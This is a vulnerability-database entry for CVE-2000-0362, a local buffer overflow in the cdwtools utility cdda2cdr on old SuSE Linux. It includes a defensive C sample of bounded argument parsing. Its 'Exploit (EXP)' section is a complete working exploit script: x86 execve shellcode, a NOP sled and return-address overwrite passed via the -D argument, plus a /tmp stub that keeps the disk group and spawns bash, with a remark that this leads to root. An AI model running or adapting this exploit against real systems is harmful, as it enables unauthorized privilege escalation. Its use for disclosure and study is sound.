Linux cdwtools vulnerability

Vulnerability ID: 1105577
Vulnerability type: Buffer overflow
Published: 1999-10-22
Updated: 2005-08-02
CVE ID: CVE-2000-0362
CNNVD ID: CNNVD-199910-038
Platform: Linux
CVSS score: 7.2
|Vulnerability sources
https://www.exploit-db.com/exploits/19565
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199910-038
|Vulnerability details
Buffer overflow in cdwtools 093 and earlier on Linux. A local user can exploit it to gain root privileges.
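What the exploit below attacks is an sgid-disk helper (cdda2cdr) that copies its `-D` device argument into a fixed stack buffer. The following is an added illustration of that bug class; it is not the cdwtools source, and the 64-byte buffer, the `-D` handling and the device-name rules are assumptions made for the demo. It shows the vulnerable shape next to a bounded, validating replacement, and a helper that measures how far an argument of the exploit's 500 bytes would overrun such a buffer:

```c
/* Added illustration of the advisory's bug class; NOT the cdwtools source.
 * Assumptions for the demo: a 64-byte device-name buffer, a "-D <device>"
 * argument taken straight from argv, and the device-name rules below. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DEV_MAX 64                /* assumed size of the device-name buffer */

enum { DEV_OK = 0, DEV_ERR_NULL = -1, DEV_ERR_LEN = -2, DEV_ERR_PATH = -3 };

/* Vulnerable shape: unbounded strcpy() of argv data into a fixed stack array.
 * A "-D" argument longer than DEV_MAX overwrites the saved return address,
 * which is what the exploit's repeated addr+offset values are aimed at.
 * Shown for contrast only; never call it with untrusted input. */
int open_device_vulnerable(const char *dev_arg)
{
    char dev[DEV_MAX];
    strcpy(dev, dev_arg);         /* no length check */
    return (int)strlen(dev);      /* stand-in for opening the device */
}

/* How many bytes a strcpy() of arg (plus its NUL) would write past a
 * bufsz-byte buffer; 0 means it fits. */
size_t overflow_bytes(const char *arg, size_t bufsz)
{
    size_t need = strlen(arg) + 1;
    return need > bufsz ? need - bufsz : 0;
}

/* Hardened replacement: the length is checked before any copy, the name
 * must live under /dev/, and parent-directory components are rejected so
 * an sgid helper cannot be pointed at files outside /dev. */
int parse_device_arg(const char *arg, char *out, size_t outsz)
{
    const char *nul;
    size_t n;
    if (arg == NULL || out == NULL || outsz == 0)
        return DEV_ERR_NULL;
    nul = memchr(arg, '\0', outsz);   /* never scans past outsz bytes */
    if (nul == NULL)
        return DEV_ERR_LEN;           /* would not fit together with its NUL */
    n = (size_t)(nul - arg);
    if (strncmp(arg, "/dev/", 5) != 0 || arg[5] == '\0')
        return DEV_ERR_PATH;
    if (strstr(arg, "/../") != NULL || strcmp(arg + n - 3, "/..") == 0)
        return DEV_ERR_PATH;
    memcpy(out, arg, n + 1);
    return DEV_OK;
}

int main(void)
{
    char dev[DEV_MAX];
    char attack[501];             /* constructed: same 500-byte shape as the exploit's buf */
    memset(attack, 0x90, 500);
    attack[500] = '\0';

    printf("/dev/sr0           -> %d\n", parse_device_arg("/dev/sr0", dev, sizeof dev));
    printf("/dev/../etc/shadow -> %d\n", parse_device_arg("/dev/../etc/shadow", dev, sizeof dev));
    printf("500-byte sled      -> %d (would overrun a %d-byte buffer by %zu bytes)\n",
           parse_device_arg(attack, dev, sizeof dev), DEV_MAX,
           overflow_bytes(attack, DEV_MAX));
    return 0;
}
```

The length check runs before any byte is copied, which is the whole difference from the vulnerable shape; the path rules are the extra guard an sgid-disk program needs, since whatever device path it opens is opened with group `disk`.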
|Exploit (EXP)
#! /bin/sh
# source: http://www.securityfocus.com/bid/738/info
#
# cdwtools is a package of utilities for CD writing. The Linux version of these
# utilities, which ships with S.u.S.E. Linux 6.1 and 6.2, is vulnerable to several
# local root compromises. It is known that there are a number of ways to exploit
# these packages, including buffer overflows and /tmp symlink attacks.
#
# --- cdda2x.sh ---
#! /bin/sh
#
# Shell script for Linux x86 cdda2cdr exploit
# Brock Tellier [email protected]
#

cat > /tmp/cdda2x.c <<'EOF'

/**
 ** Linux x86 exploit for /usr/bin/cdda2cdr (sgid disk on some Linux distros)

 ** gcc -o cdda2x cdda2x.c; cdda2x <offset> <bufsiz>
 **
 ** Brock Tellier [email protected]
 **/


#include <stdlib.h>
#include <stdio.h>
#include <string.h>   /* memset, memcpy, strlen */
#include <unistd.h>   /* execl */

/* Generic Linux x86 execve() shellcode: jmp/call trick to locate the path
 * string, write argv[0] and the NUL terminator in place, execve("/tmp/cd"),
 * then exit(0). /tmp/cd is the sgid-inheriting shell stub built below. */
char exec[]=
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/tmp/cd";



#define LEN 500
#define NOP 0x90

/* Return the current stack pointer; the guessed return address is
 * get_sp() + offset and must land inside the NOP sled in buf. */
unsigned long get_sp(void) {

__asm__("movl %esp, %eax");

}


int main(int argc, char *argv[]) {

int offset=0;
int i;
int buflen = LEN;
long int addr;
char buf[LEN];

 if(argc > 3) {
  fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
 exit(0);
 }
 else if (argc == 2){
   offset=atoi(argv[1]);

 }
 else if (argc == 3) {
   offset=atoi(argv[1]);
   buflen=atoi(argv[2]);

 }
 else {
   offset=500;
   buflen=500;

 }

 /* buf is a fixed LEN-byte array; a larger request would overflow the
  * exploit itself, so clamp it. */
 if (buflen > LEN) buflen = LEN;


addr=get_sp();

fprintf(stderr, "Linux x86 cdda2cdr local disk exploit\n");
fprintf(stderr, "Brock Tellier [email protected]\n");
fprintf(stderr, "Using addr: 0x%lx\n", addr+offset);

/* Layout: NOP sled in the first half, shellcode in the middle, then the
 * guessed return address repeated up to the end so the overwritten saved
 * EIP lands in the sled regardless of the exact frame layout. */
memset(buf,NOP,buflen);
memcpy(buf+(buflen/2),exec,strlen(exec));
for(i=((buflen/2) + strlen(exec))+1;i<buflen-4;i+=4)
 *(int *)&buf[i]=addr+offset;
buf[buflen-1]='\0';   /* terminate so execl() passes buf as a string */

/* The overlong -D (device) argument is what overflows cdda2cdr's buffer. */
execl("/usr/bin/cdda2cdr", "cdda2cdr", "-D", buf, NULL);
perror("execl");
return 1;


/*
for (i=0; i < strlen(buf); i++) putchar(buf[i]);
*/

}

EOF

cat > /tmp/cd.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

/* Run by the shellcode: make the inherited effective gid (disk) the real
 * gid as well, so the spawned bash keeps it. */
int main(void) {
    setregid(getegid(), getegid());
    system("/bin/bash");
    return 0;
}
EOF

# 32-bit x86 code: on a 64-bit host add -m32 to both gcc lines
gcc -o /tmp/cd /tmp/cd.c
gcc -o /tmp/cdda2x /tmp/cdda2x.c
echo "Note that gid=6 leads to easy root access.."
/tmp/cdda2x
|References

Source: BID
Name: 738
Link: http://www.securityfocus.com/bid/738
Source: SUSE
Name: 19991019 Security hole in cdwtools < 093
Link: http://www.novell.com/linux/security/advisories/suse_security_announce_25.html
